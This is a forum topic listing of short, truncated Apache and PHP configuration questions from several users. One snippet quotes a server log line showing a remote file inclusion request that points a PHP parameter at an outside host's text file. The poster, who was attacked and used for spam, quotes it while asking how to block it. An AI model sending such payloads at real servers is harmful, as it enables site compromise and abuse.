1,520 Topics
| |
Hi everyone, I am taking a web programming class and for one of the assignments, we have to install and configure an Apache web server on a certain port. I have downloaded apache, customized the httpd.conf file, and now I am ready to start the server. Per our class handouts, … | |
In my website I have all the links are relative and look like var1/ or var1/var2/ I want to redirect them to index.php?p=var1 or index.php?p=var1/var2 without changing the address in the address bar. So I did this: RewriteEngine on RewriteRule ^(.+)/$ index.php?p=$1 [QSA,L] and it works fine. But I'd also … | |
I currently run a proxy server as a member of the TOR network, but since only members of the TOR network can access the proxy, I have decided to install circumventor on my computer... It was difficult enough to successfully install apache2, but then I could not get circumventor to … | |
i, i want to execute my code to rewriting url in on the fly and i have to get $_requet values in code for example original typed url in browser: [url]http://localhost/mypet1/a1[/url] [url]http://localhost/mypet1/a1/?page=sp_login[/url] [url]http://localhost/mypet1/a1/index.php[/url] [url]http://localhost/mypet1/a1/index.php?page=sp_login[/url] execution url [url]http://localhost/mypet1/?sp=a1[/url] [url]http://localhost/mypet1/?sp=a1&page=sp_login[/url] [url]http://localhost/mypet1/index.php?sp=a1[/url] [url]http://localhost/mypet1/index.php?sp=a1&page=sp_login[/url] i need to get in my code $_REquest['sp']; value is … | |
I want your opinion on masking domains. I've got a fairly small site that I set up, and don't want to purchase a new hosting plan for it, so I'm just forwarding the domain to a folder within one of my other domains, and I'm masking it so it looks … | |
I never know if I'm putting these in the right place. Anyway, I have been having trouble ftp'ing larger files or larger groups of small files to my ftp server lately. I'm hosting with globat.com, and they say there are no problems. I'm using SmartFTP. My ISP is Qwest. After … | |
[B]My system :[/B] suse:~ # uname -a Linux suse 2.6.5-7.244-s390 #1 SMP Mon Dec 12 18:32:25 UTC 2005 s390 s390 s390 GNU/Linux [B]Logging as notes user & running Domino Server[/B] notes@suse:/local/notesdata> export DOMINO_LINUX_SET_PARMS=1 notes@suse:/local/notesdata> /opt/lotus/bin/server /proc/sys/fs/file-max has been set to the recommended value of 131072 /proc/sys/net/ipv4/tcp_fin_timeout has been set to … | |
I am fairly new to mod_rewrite, but what I'm trying to do is redirect HTTP requests from the format [URL]http://www.example.com/username[/URL] to serve up content from a structured directory of users below my document root. My document root is located at /var/www/html To keep the usernames organized and secure, I have … | |
Hi all, I have download Apache POI(2.5.1) to convert a Excel file to XML using NetBeans5.0 . After Unzipping i got three Executable JAR files 1.poi-2.5.1-final 2.poi-contrib-2.5.1 3.poi-scratch-2.5.1 Please tell what steps i have to do to install it (or) just it's enough to just point out that JAR files … | |
Hello everyone. I decided to try out XAMPP ( [url]http://www.apachefriends.org/en/xampp[/url] ), which contains a pre configured distribution of Apache 2.2.3. My intention is to use it for some local testing of a web application that uses Perl scripts. I got Apache running easily enough and it runs the sample Perl … | |
Hi, I have a Linux box running Apache 2.0.52. I can go to http://192.168.0.70 (the IP address of the linux box), and display the Red Hat Enterprise Linux Test Page. However, when I try to go to http://192.168.0.70/~starfish/index.html, it returns a 403 Forbidden error. The index.html file currently resides within … | |
I get the following error message when I try to test Apache SOAPServer by pointing my browser to [URL]http://localhost:8080/soap/servlet/rpcrouter[/URL] [B]exception[/B] javax.servlet.ServletException: javax/mail/MessagingException org.apache.jasper.runtime.PageContextImpl.doHandlePageException(PageContextImpl.java:848) org.apache.jasper.runtime.PageContextImpl.handlePageException(PageContextImpl.java:781) org.apache.jsp.admin.undeploy_jsp._jspService(org.apache.jsp.admin.undeploy_jsp:105) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:322) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:291) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:241) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) [B]root cause[/B] java.lang.NoClassDefFoundError: javax/mail/MessagingException org.apache.jsp.admin.undeploy_jsp._jspService(org.apache.jsp.admin.undeploy_jsp:55) org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:97) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:322) org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:291) org.apache.jasper.servlet.JspServlet.service(JspServlet.java:241) javax.servlet.http.HttpServlet.service(HttpServlet.java:802) I have set my class path's to: ;C:\jakarta-tomcat-4.0.1\common\lib\xerces.jar;C:\soap-2_3\lib\soap.jar;C:\soap-2_3; … | |
hi all, now a days i am facing a severe problem in my website.it is due to my web hosting provider.because now they changed the php as cgi module(I think),so the php_value [B]include_path in .htaccess[/B] file is not working now.Before changing the php as cgi module it worked well.If I … | |
i found in the logs last night that somebody had injected a code malicious enough to do spam. please help "POST /index.php?target=http://www.geocities.com/yo5w/jkr.txt? enabled the user to spam. how to avoid this? any htaccess solution on this. | |
I have made a Image folder in my c:/program files/apache group/apache2.I don't want to put all of my images in the "htdocs" folder. my images come up if i place the image in the "htdocs folder" but will not come up if i place them in the Image folder that … | |
Hi I'm trying to configure apache for PHP. Can somebody tell me where I can find the http.conf file of the default Apache 1.3 webserver which comes with OsX? I can't find this entire Apache directory. The server is running allright (I checked it in my browser at [url]http://localhost[/url]) And … | |
[B]hi all this is steve burrus and I seem to have a problem with my copy of apache 2.2, integrated into PHP, being able to have its' port bind well enough for it the apache server to start up. :sad: Can someone plz help me with this? [/B] | |
Been tring to set up apache for 4 days now.have it running to get web page as index.html in its own directory,from LocalHost. I have a domain name at godaddy {parked]Forwarded to my DYNDNS. My host name at Dyndns is "homerepairs.is-a-geek.net. My domain name is homerepairsdoneforless.com. My computer{web-server] i named … | |
Hello and Hapy Thanksgiving! I've recently set up an old Compaq Deskpro 2000 as a web server. I'm running Damn Small Linux and Apache 2.0.54. Everything works perfect except for one small thing—Apache doesn't start with the system. Does anyone know how to setup Apache to startup when the system … | |
First, I suspect that this is in the wrong place, but I'm not sure where else to put it. If this post does belong somewhere else, would a moderator please kindly move it to where it should be? Thank you. I'm trying to upgrade from php4 to php5 on a … | |
First: If this is in the wrong forum, I apologize. My question is more concerned with figuring out the correct configuration with the Apache2 web server than with anything dealing particularly with PHP. I simply did not see an appropriate forum for this type of topic. If such a forum … | |
I would like to be able to add PHP support into my existing installation of Apache (v 2.2). It is running on MS Windows XP. I already have the binary distribution of PHP, I would just like to know how to integrate it into Apache. I do not have MS … | |
Hi, I am a very beginner and have been told to sort this out for my company as the person that created the system has gone into the military. We currently have one domain with many sub-domains which is forwarded from domain company A to our Linux server which then … | |
Its weired that even after I 1) changed the file name from "php.conf" to "php.bak" (so that the php module wouldn't be loaded); and 2) enabled "HTTPD=/usr/sbin/httpd.worker" in "/etc/sysconfig/httpd". After I restarted the httpd service successfully (no conflict with php), I still found that the "prefork" MPM was running in … | |
I've been requested to upgrade php on a number of systems. Currently, they are running version 4.3.4, and the most recent upgrade on the php.net site was version 5.1.6. I've never done this before, and have little clue what I'm supposed to be doing. I'm hoping that once I get … | |
can you help me whith [b].httpaccess...[/b]give link or links whith information about .httpaccess...thanks.. Megab0rt | |
In devoloping CGI scripts, I noticed that my apache server set stack size as 10MB for apache users. However, my cgi script needs to invoke a C executable that requires a larger stack size. I wonder how to increase the stack size for apache users. I tried the following 2 … | |
Hello. I have been having trouble with my Apache server (or perhaps something else, like DNS) for a while now. I have tried to find a solution, but my keywords always come up with almost completely unrelated webpages. I have a website, [url]www.ilikerps.net[/url] with redirection to my IP address, and … | |
I have googled for anyoneexperiencing the same error. Apache2.2 works fine as stand alone. Now, when installing php5.x and after making the changes in the httpd.conf file for Apache, Apache doesn't read the php file. Changes in httpd.conf file were : # For PHP 5 - Added on Oct. 13 … | |
- we have our own domain which is hosted by a third party company and we use it for our website, our own company email and our ftp and my concern is its securityi although our domain has a cpanel which makes us able to do some configurations on our … |
The End.